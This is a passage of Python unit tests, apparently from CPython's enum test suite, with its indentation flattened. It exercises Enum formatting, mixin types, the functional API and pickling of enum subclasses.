def __format__(self, spec):
return 'Format!'
self.assertEqual(str(MixinWithStrFormatOverrides.one), 'Str!')
self.assertEqual('{}'.format(MixinWithStrFormatOverrides.one), 'Format!')
def test_format_override_mixin(self):
class TestFloat(float, Enum):
one = 1.0
two = 2.0
def __format__(self, spec):
return 'TestFloat success!'
self.assertEqual(str(TestFloat.one), 'one')
self.assertEqual('{}'.format(TestFloat.one), 'TestFloat success!')
@unittest.skipIf(
python_version < (3, 12),
'mixin-format is still using member.value',
)
def test_mixin_format_warning(self):
class Grades(int, Enum):
A = 5
B = 4
C = 3
D = 2
F = 0
self.assertEqual(f'{self.Grades.B}', 'B')
@unittest.skipIf(
python_version >= (3, 12),
'mixin-format now uses member instead of member.value',
)
def test_mixin_format_warning(self):
class Grades(int, Enum):
A = 5
B = 4
C = 3
D = 2
F = 0
with self.assertWarns(DeprecationWarning):
self.assertEqual(f'{Grades.B}', '4')
def assertFormatIsValue(self, spec, member):
if python_version < (3, 12) and (not spec or spec in ('{}','{:}')):
with self.assertWarns(DeprecationWarning):
self.assertEqual(spec.format(member), spec.format(member.value))
else:
self.assertEqual(spec.format(member), spec.format(member.value))
def test_format_enum_date(self):
Holiday = self.Holiday
self.assertFormatIsValue('{}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:20}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:^20}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:>20}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:<20}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:%Y %m}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:%Y %m %M:00}', Holiday.IDES_OF_MARCH)
def test_format_enum_float(self):
Konstants = self.Konstants
self.assertFormatIsValue('{}', Konstants.TAU)
self.assertFormatIsValue('{:}', Konstants.TAU)
self.assertFormatIsValue('{:20}', Konstants.TAU)
self.assertFormatIsValue('{:^20}', Konstants.TAU)
self.assertFormatIsValue('{:>20}', Konstants.TAU)
self.assertFormatIsValue('{:<20}', Konstants.TAU)
self.assertFormatIsValue('{:n}', Konstants.TAU)
self.assertFormatIsValue('{:5.2}', Konstants.TAU)
self.assertFormatIsValue('{:f}', Konstants.TAU)
def test_format_enum_int(self):
class Grades(int, Enum):
A = 5
B = 4
C = 3
D = 2
F = 0
self.assertFormatIsValue('{}', Grades.C)
self.assertFormatIsValue('{:}', Grades.C)
self.assertFormatIsValue('{:20}', Grades.C)
self.assertFormatIsValue('{:^20}', Grades.C)
self.assertFormatIsValue('{:>20}', Grades.C)
self.assertFormatIsValue('{:<20}', Grades.C)
self.assertFormatIsValue('{:+}', Grades.C)
self.assertFormatIsValue('{:08X}', Grades.C)
self.assertFormatIsValue('{:b}', Grades.C)
def test_format_enum_str(self):
Directional = self.Directional
self.assertFormatIsValue('{}', Directional.WEST)
self.assertFormatIsValue('{:}', Directional.WEST)
self.assertFormatIsValue('{:20}', Directional.WEST)
self.assertFormatIsValue('{:^20}', Directional.WEST)
self.assertFormatIsValue('{:>20}', Directional.WEST)
self.assertFormatIsValue('{:<20}', Directional.WEST)
def test_object_str_override(self):
class Colors(Enum):
RED, GREEN, BLUE = 1, 2, 3
def __repr__(self):
return "test.%s" % (self._name_, )
__str__ = object.__str__
self.assertEqual(str(Colors.RED), 'test.RED')
def test_enum_str_override(self):
class MyStrEnum(Enum):
def __str__(self):
return 'MyStr'
class MyMethodEnum(Enum):
def hello(self):
return 'Hello! My name is %s' % self.name
class Test1Enum(MyMethodEnum, int, MyStrEnum):
One = 1
Two = 2
self.assertTrue(Test1Enum._member_type_ is int)
self.assertEqual(str(Test1Enum.One), 'MyStr')
self.assertEqual(format(Test1Enum.One, ''), 'MyStr')
#
class Test2Enum(MyStrEnum, MyMethodEnum):
One = 1
Two = 2
self.assertEqual(str(Test2Enum.One), 'MyStr')
self.assertEqual(format(Test1Enum.One, ''), 'MyStr')
def test_inherited_data_type(self):
class HexInt(int):
def __repr__(self):
return hex(self)
class MyEnum(HexInt, enum.Enum):
A = 1
B = 2
C = 3
def __repr__(self):
return '<%s.%s: %r>' % (self.__class__.__name__, self._name_, self._value_)
self.assertEqual(repr(MyEnum.A), '<MyEnum.A: 0x1>')
#
class SillyInt(HexInt):
__qualname__ = 'SillyInt'
pass
class MyOtherEnum(SillyInt, enum.Enum):
__qualname__ = 'MyOtherEnum'
D = 4
E = 5
F = 6
self.assertIs(MyOtherEnum._member_type_, SillyInt)
globals()['SillyInt'] = SillyInt
globals()['MyOtherEnum'] = MyOtherEnum
test_pickle_dump_load(self.assertIs, MyOtherEnum.E)
test_pickle_dump_load(self.assertIs, MyOtherEnum)
#
# This did not work in 3.9, but does now with pickling by name
class UnBrokenInt(int):
__qualname__ = 'UnBrokenInt'
def __new__(cls, value):
return int.__new__(cls, value)
class MyUnBrokenEnum(UnBrokenInt, Enum):
__qualname__ = 'MyUnBrokenEnum'
G = 7
H = 8
I = 9
self.assertIs(MyUnBrokenEnum._member_type_, UnBrokenInt)
self.assertIs(MyUnBrokenEnum(7), MyUnBrokenEnum.G)
globals()['UnBrokenInt'] = UnBrokenInt
globals()['MyUnBrokenEnum'] = MyUnBrokenEnum
test_pickle_dump_load(self.assertIs, MyUnBrokenEnum.I)
test_pickle_dump_load(self.assertIs, MyUnBrokenEnum)
def test_too_many_data_types(self):
with self.assertRaisesRegex(TypeError, 'too many data types'):
class Huh(str, int, Enum):
One = 1
class MyStr(str):
def hello(self):
return 'hello, %s' % self
class MyInt(int):
def repr(self):
return hex(self)
with self.assertRaisesRegex(TypeError, 'too many data types'):
class Huh(MyStr, MyInt, Enum):
One = 1
def test_value_auto_assign(self):
class Some(Enum):
def __new__(cls, val):
return object.__new__(cls)
x = 1
y = 2
self.assertEqual(Some.x.value, 1)
self.assertEqual(Some.y.value, 2)
def test_hash(self):
Season = self.Season
dates = {}
dates[Season.WINTER] = '1225'
dates[Season.SPRING] = '0315'
dates[Season.SUMMER] = '0704'
dates[Season.AUTUMN] = '1031'
self.assertEqual(dates[Season.AUTUMN], '1031')
def test_intenum_from_scratch(self):
class phy(int, Enum):
pi = 3
tau = 2 * pi
self.assertTrue(phy.pi < phy.tau)
def test_intenum_inherited(self):
class IntEnum(int, Enum):
pass
class phy(IntEnum):
pi = 3
tau = 2 * pi
self.assertTrue(phy.pi < phy.tau)
def test_floatenum_from_scratch(self):
class phy(float, Enum):
pi = 3.1415926
tau = 2 * pi
self.assertTrue(phy.pi < phy.tau)
def test_floatenum_inherited(self):
class FloatEnum(float, Enum):
pass
class phy(FloatEnum):
pi = 3.1415926
tau = 2 * pi
self.assertTrue(phy.pi < phy.tau)
def test_strenum_from_scratch(self):
class phy(str, Enum):
pi = 'Pi'
tau = 'Tau'
self.assertTrue(phy.pi < phy.tau)
def test_strenum_inherited_methods(self):
class phy(StrEnum):
pi = 'Pi'
tau = 'Tau'
self.assertTrue(phy.pi < phy.tau)
self.assertEqual(phy.pi.upper(), 'PI')
self.assertEqual(phy.tau.count('a'), 1)
def test_intenum(self):
class WeekDay(IntEnum):
SUNDAY = 1
MONDAY = 2
TUESDAY = 3
WEDNESDAY = 4
THURSDAY = 5
FRIDAY = 6
SATURDAY = 7
self.assertEqual(['a', 'b', 'c'][WeekDay.MONDAY], 'c')
self.assertEqual([i for i in range(WeekDay.TUESDAY)], [0, 1, 2])
lst = list(WeekDay)
self.assertEqual(len(lst), len(WeekDay))
self.assertEqual(len(WeekDay), 7)
target = 'SUNDAY MONDAY TUESDAY WEDNESDAY THURSDAY FRIDAY SATURDAY'
target = target.split()
for i, weekday in enumerate(target, 1):
e = WeekDay(i)
self.assertEqual(e, i)
self.assertEqual(int(e), i)
self.assertEqual(e.name, weekday)
self.assertIn(e, WeekDay)
self.assertEqual(lst.index(e)+1, i)
self.assertTrue(0 < e < 8)
self.assertIs(type(e), WeekDay)
self.assertIsInstance(e, int)
self.assertIsInstance(e, Enum)
def test_intenum_duplicates(self):
class WeekDay(IntEnum):
SUNDAY = 1
MONDAY = 2
TUESDAY = TEUSDAY = 3
WEDNESDAY = 4
THURSDAY = 5
FRIDAY = 6
SATURDAY = 7
self.assertIs(WeekDay.TEUSDAY, WeekDay.TUESDAY)
self.assertEqual(WeekDay(3).name, 'TUESDAY')
self.assertEqual([k for k,v in WeekDay.__members__.items()
if v.name != k], ['TEUSDAY', ])
def test_intenum_from_bytes(self):
self.assertIs(IntStooges.from_bytes(b'\x00\x03', 'big'), IntStooges.MOE)
with self.assertRaises(ValueError):
IntStooges.from_bytes(b'\x00\x05', 'big')
def test_floatenum_fromhex(self):
h = float.hex(FloatStooges.MOE.value)
self.assertIs(FloatStooges.fromhex(h), FloatStooges.MOE)
h = float.hex(FloatStooges.MOE.value + 0.01)
with self.assertRaises(ValueError):
FloatStooges.fromhex(h)
def test_pickle_enum(self):
if isinstance(Stooges, Exception):
raise Stooges
test_pickle_dump_load(self.assertIs, Stooges.CURLY)
test_pickle_dump_load(self.assertIs, Stooges)
def test_pickle_int(self):
if isinstance(IntStooges, Exception):
raise IntStooges
test_pickle_dump_load(self.assertIs, IntStooges.CURLY)
test_pickle_dump_load(self.assertIs, IntStooges)
def test_pickle_float(self):
if isinstance(FloatStooges, Exception):
raise FloatStooges
test_pickle_dump_load(self.assertIs, FloatStooges.CURLY)
test_pickle_dump_load(self.assertIs, FloatStooges)
def test_pickle_enum_function(self):
if isinstance(Answer, Exception):
raise Answer
test_pickle_dump_load(self.assertIs, Answer.him)
test_pickle_dump_load(self.assertIs, Answer)
def test_pickle_enum_function_with_module(self):
if isinstance(Question, Exception):
raise Question
test_pickle_dump_load(self.assertIs, Question.who)
test_pickle_dump_load(self.assertIs, Question)
def test_enum_function_with_qualname(self):
if isinstance(Theory, Exception):
raise Theory
self.assertEqual(Theory.__qualname__, 'spanish_inquisition')
def test_class_nested_enum_and_pickle_protocol_four(self):
# would normally just have this directly in the class namespace
class NestedEnum(Enum):
twigs = 'common'
shiny = 'rare'
self.__class__.NestedEnum = NestedEnum
self.NestedEnum.__qualname__ = '%s.NestedEnum' % self.__class__.__name__
test_pickle_dump_load(self.assertIs, self.NestedEnum.twigs)
def test_pickle_by_name(self):
class ReplaceGlobalInt(IntEnum):
ONE = 1
TWO = 2
ReplaceGlobalInt.__reduce_ex__ = enum._reduce_ex_by_global_name
for proto in range(HIGHEST_PROTOCOL):
self.assertEqual(ReplaceGlobalInt.TWO.__reduce_ex__(proto), 'TWO')
def test_exploding_pickle(self):
BadPickle = Enum(
'BadPickle', 'dill sweet bread-n-butter', module=__name__)
globals()['BadPickle'] = BadPickle
# now break BadPickle to test exception raising
enum._make_class_unpicklable(BadPickle)
test_pickle_exception(self.assertRaises, TypeError, BadPickle.dill)
test_pickle_exception(self.assertRaises, PicklingError, BadPickle)
def test_string_enum(self):
class SkillLevel(str, Enum):
master = 'what is the sound of one hand clapping?'
journeyman = 'why did the chicken cross the road?'
apprentice = 'knock, knock!'
self.assertEqual(SkillLevel.apprentice, 'knock, knock!')
def test_getattr_getitem(self):
class Period(Enum):
morning = 1
noon = 2
evening = 3
night = 4
self.assertIs(Period(2), Period.noon)
self.assertIs(getattr(Period, 'night'), Period.night)
self.assertIs(Period['morning'], Period.morning)
def test_getattr_dunder(self):
Season = self.Season
self.assertTrue(getattr(Season, '__eq__'))
def test_iteration_order(self):
class Season(Enum):
SUMMER = 2
WINTER = 4
AUTUMN = 3
SPRING = 1
self.assertEqual(
list(Season),
[Season.SUMMER, Season.WINTER, Season.AUTUMN, Season.SPRING],
)
def test_reversed_iteration_order(self):
self.assertEqual(
list(reversed(self.Season)),
[self.Season.WINTER, self.Season.AUTUMN, self.Season.SUMMER,
self.Season.SPRING]
)
def test_programmatic_function_string(self):
SummerMonth = Enum('SummerMonth', 'june july august')
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_string_with_start(self):
SummerMonth = Enum('SummerMonth', 'june july august', start=10)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 10):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_string_list(self):
SummerMonth = Enum('SummerMonth', ['june', 'july', 'august'])
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_string_list_with_start(self):
SummerMonth = Enum('SummerMonth', ['june', 'july', 'august'], start=20)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 20):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_iterable(self):
SummerMonth = Enum(
'SummerMonth',
(('june', 1), ('july', 2), ('august', 3))
)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_from_dict(self):
SummerMonth = Enum(
'SummerMonth',
OrderedDict((('june', 1), ('july', 2), ('august', 3)))
)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_type(self):
SummerMonth = Enum('SummerMonth', 'june july august', type=int)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_type_with_start(self):
SummerMonth = Enum('SummerMonth', 'june july august', type=int, start=30)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 30):
e = SummerMonth(i)
self.assertEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_type_from_subclass(self):
SummerMonth = IntEnum('SummerMonth', 'june july august')
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_type_from_subclass_with_start(self):
SummerMonth = IntEnum('SummerMonth', 'june july august', start=40)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 40):
e = SummerMonth(i)
self.assertEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
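# Note on the functional API exercised above: Enum('Name', names, type=..., start=...)
# accepts names as a whitespace or comma separated string, a list of names, an
# iterable of (name, value) pairs, or a mapping; start only applies when values are
# auto-assigned, and type= mixes in a concrete type such as int. A minimal sketch:
#     Grade = Enum('Grade', 'A B C', start=1)       # Grade.A.value == 1
#     Size = Enum('Size', [('S', 1), ('L', 2)])     # explicit (name, value) pairs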
def test_subclassing(self):
if isinstance(Name, Exception):
raise Name
self.assertEqual(Name.BDFL, 'Guido van Rossum')
self.assertIs(Name.BDFL, Name('Guido van Rossum'))
self.assertIs(Name.BDFL, getattr(Name, 'BDFL'))
test_pickle_dump_load(self.assertIs, Name.BDFL)
def test_extending(self):
class Color(Enum):
red = 1
green = 2
blue = 3
with self.assertRaises(TypeError):
class MoreColor(Color):
cyan = 4
magenta = 5
yellow = 6
with self.assertRaisesRegex(TypeError, "EvenMoreColor: cannot extend enumeration 'Color'"):
class EvenMoreColor(Color, IntEnum):
chartreuse = 7
def test_exclude_methods(self):
class whatever(Enum):
this = 'that'
these = 'those'
def really(self):
return 'no, not %s' % self.value
self.assertIsNot(type(whatever.really), whatever)
self.assertEqual(whatever.this.really(), 'no, not that')
def test_wrong_inheritance_order(self):
with self.assertRaises(TypeError):
class Wrong(Enum, str):
NotHere = 'error before this point'
def test_intenum_transitivity(self):
class number(IntEnum):
one = 1
two = 2
three = 3
class numero(IntEnum):
uno = 1
dos = 2
tres = 3
self.assertEqual(number.one, numero.uno)
self.assertEqual(number.two, numero.dos)
self.assertEqual(number.three, numero.tres)
def test_wrong_enum_in_call(self):
class Monochrome(Enum):
black = 0
white = 1
class Gender(Enum):
male = 0
female = 1
self.assertRaises(ValueError, Monochrome, Gender.male)
def test_wrong_enum_in_mixed_call(self):
class Monochrome(IntEnum):
black = 0
white = 1
class Gender(Enum):
male = 0
female = 1
self.assertRaises(ValueError, Monochrome, Gender.male)
def test_mixed_enum_in_call_1(self):
class Monochrome(IntEnum):
black = 0
white = 1
class Gender(IntEnum):
male = 0
female = 1
self.assertIs(Monochrome(Gender.female), Monochrome.white)
def test_mixed_enum_in_call_2(self):
class Monochrome(Enum):
black = 0
white = 1
class Gender(IntEnum):
male = 0
female = 1
self.assertIs(Monochrome(Gender.male), Monochrome.black)
def test_flufl_enum(self):
class Fluflnum(Enum):
def __int__(self):
return int(self.value)
class MailManOptions(Fluflnum):
option1 = 1
option2 = 2
option3 = 3
self.assertEqual(int(MailManOptions.option1), 1)
def test_introspection(self):
class Number(IntEnum):
one = 100
two = 200
self.assertIs(Number.one._member_type_, int)
self.assertIs(Number._member_type_, int)
class String(str, Enum):
yarn = 'soft'
rope = 'rough'
wire = 'hard'
self.assertIs(String.yarn._member_type_, str)
self.assertIs(String._member_type_, str)
class Plain(Enum):
vanilla = 'white'
one = 1
self.assertIs(Plain.vanilla._member_type_, object)
self.assertIs(Plain._member_type_, object)
def test_no_such_enum_member(self):
class Color(Enum):
red = 1
green = 2
blue = 3
with self.assertRaises(ValueError):
Color(4)
with self.assertRaises(KeyError):
Color['chartreuse']
def test_new_repr(self):
class Color(Enum):
red = 1
green = 2
blue = 3
def __repr__(self):
return "don't you just love shades of %s?" % self.name
self.assertEqual(
repr(Color.blue),
"don't you just love shades of blue?",
)
def test_inherited_repr(self):
class MyEnum(Enum):
def __repr__(self):
return "My name is %s." % self.name
class MyIntEnum(int, MyEnum):
this = 1
that = 2
theother = 3
self.assertEqual(repr(MyIntEnum.that), "My name is that.")
def test_multiple_mixin_mro(self):
class auto_enum(type(Enum)):
def __new__(metacls, cls, bases, classdict):
temp = type(classdict)()
temp._cls_name = cls
names = set(classdict._member_names)
i = 0
for k in classdict._member_names:
v = classdict[k]
if v is Ellipsis:
v = i
else:
i = v
i += 1
temp[k] = v
for k, v in classdict.items():
if k not in names:
temp[k] = v
return super(auto_enum, metacls).__new__(
metacls, cls, bases, temp)
class AutoNumberedEnum(Enum, metaclass=auto_enum):
pass
class AutoIntEnum(IntEnum, metaclass=auto_enum):
pass
class TestAutoNumber(AutoNumberedEnum):
a = ...
b = 3
c = ...
class TestAutoInt(AutoIntEnum):
a = ...
b = 3
c = ...
def test_subclasses_with_getnewargs(self):
class NamedInt(int):
__qualname__ = 'NamedInt' # needed for pickle protocol 4
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
def __getnewargs__(self):
return self._args
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(
type(self).__name__,
self.__name__,
int.__repr__(self),
)
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int(other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp,
)
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI' # needed for pickle protocol 4
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
test_pickle_dump_load(self.assertEqual, NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_subclasses_with_getnewargs_ex(self):
class NamedInt(int):
__qualname__ = 'NamedInt' # needed for pickle protocol 4
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
def __getnewargs_ex__(self):
return self._args, {}
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(
type(self).__name__,
self.__name__,
int.__repr__(self),
)
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int(other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp,
)
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI' # needed for pickle protocol 4
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
test_pickle_dump_load(self.assertEqual, NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_subclasses_with_reduce(self):
class NamedInt(int):
__qualname__ = 'NamedInt' # needed for pickle protocol 4
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
def __reduce__(self):
return self.__class__, self._args
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(
type(self).__name__,
self.__name__,
int.__repr__(self),
)
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int(other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp,
)
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI' # needed for pickle protocol 4
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
test_pickle_dump_load(self.assertEqual, NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_subclasses_with_reduce_ex(self):
class NamedInt(int):
__qualname__ = 'NamedInt' # needed for pickle protocol 4
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
def __reduce_ex__(self, proto):
return self.__class__, self._args
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(
type(self).__name__,
self.__name__,
int.__repr__(self),
)
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int(other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp,
)
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI' # needed for pickle protocol 4
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
test_pickle_dump_load(self.assertEqual, NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_subclasses_without_direct_pickle_support(self):
class NamedInt(int):
__qualname__ = 'NamedInt'
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(
type(self).__name__,
self.__name__,
int.__repr__(self),
)
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int(other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp)
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI'
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_subclasses_with_direct_pickle_support(self):
class NamedInt(int):
__qualname__ = 'NamedInt'
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(
type(self).__name__,
self.__name__,
int.__repr__(self),
)
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int(other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp,
)
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI'
x = ('the-x', 1)
y = ('the-y', 2)
def __reduce_ex__(self, proto):
return getattr, (self.__class__, self._name_)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
